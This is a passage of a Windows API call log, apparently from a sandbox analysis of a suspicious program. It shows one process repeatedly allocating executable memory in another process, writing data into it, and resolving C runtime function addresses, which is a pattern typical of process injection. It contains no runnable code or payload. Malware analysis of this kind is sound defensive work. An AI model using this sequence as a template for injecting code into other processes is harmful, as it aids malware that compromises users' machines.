	[0188.146] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.146] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.146] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.146] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.147] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055324, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.147] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.147] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.147] lstrlenA (lpString="_wcsicmp") returned 8
	[0188.147] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.147] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f6a*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f6a*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0188.148] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.148] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.148] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.148] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.149] ResetEvent (hEvent=0x478) returned 1
	[0188.149] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.149] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.149] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.149] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.149] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.149] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055328, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.150] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.150] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.150] lstrlenA (lpString="memcpy") returned 6
	[0188.150] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.150] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb78dc*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb78dc*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0188.150] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.150] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.151] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.151] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.151] ResetEvent (hEvent=0x478) returned 1
	[0188.151] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.151] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.151] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.152] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.152] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.152] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005532c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.153] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.154] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.154] lstrlenA (lpString="strrchr") returned 7
	[0188.154] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.154] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb78e6*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb78e6*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
	[0188.154] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.154] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.155] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.155] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.156] ResetEvent (hEvent=0x478) returned 1
	[0188.156] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.156] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.156] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.156] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.156] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055330, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.157] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.157] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.157] lstrlenA (lpString="memcmp") returned 6
	[0188.157] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.157] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb78f0*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb78f0*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0188.157] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.157] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.158] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.158] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.158] ResetEvent (hEvent=0x478) returned 1
	[0188.158] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.158] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.158] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.159] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.159] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055334, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.159] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.159] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.159] lstrlenA (lpString="strchr") returned 6
	[0188.159] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.159] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f56*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f56*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0188.160] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.160] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.160] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.160] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.160] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.161] ResetEvent (hEvent=0x478) returned 1
	[0188.161] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.161] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.161] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.161] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.161] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055338, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.162] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.162] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.162] lstrlenA (lpString="memset") returned 6
	[0188.162] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.162] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f4c*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f4c*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0188.163] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.163] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.163] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.163] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.163] ResetEvent (hEvent=0x478) returned 1
	[0188.163] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.164] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.164] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.164] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.164] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.164] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005533c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.164] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.164] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.164] lstrlenA (lpString="strstr") returned 6
	[0188.164] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.165] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f42*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f42*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0188.165] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.165] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.165] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.165] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.166] ResetEvent (hEvent=0x478) returned 1
	[0188.166] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.166] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.166] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.166] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.166] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.166] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055340, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.167] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.167] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.167] lstrlenA (lpString="strncpy") returned 7
	[0188.167] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.167] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f38*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f38*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
	[0188.167] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.167] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.167] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.168] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.168] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.168] ResetEvent (hEvent=0x478) returned 1
	[0188.168] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.169] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.169] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.169] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.169] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.169] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055344, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.169] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.170] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.170] lstrlenA (lpString="strncat") returned 7
	[0188.170] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.170] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb793a*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb793a*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
	[0188.170] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.170] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.170] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.170] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.171] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.171] ResetEvent (hEvent=0x478) returned 1
	[0188.171] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.171] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.171] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.171] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.171] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.171] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055348, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.172] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.172] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.172] lstrlenA (lpString="strncmp") returned 7
	[0188.172] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.172] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7944*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7944*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
	[0188.172] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.173] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.173] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.173] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.173] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.173] ResetEvent (hEvent=0x478) returned 1
	[0188.173] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.174] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.174] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.174] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.174] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.174] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005534c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.175] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.175] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.175] lstrlenA (lpString="memmove") returned 7
	[0188.175] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.175] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f2e*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f2e*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
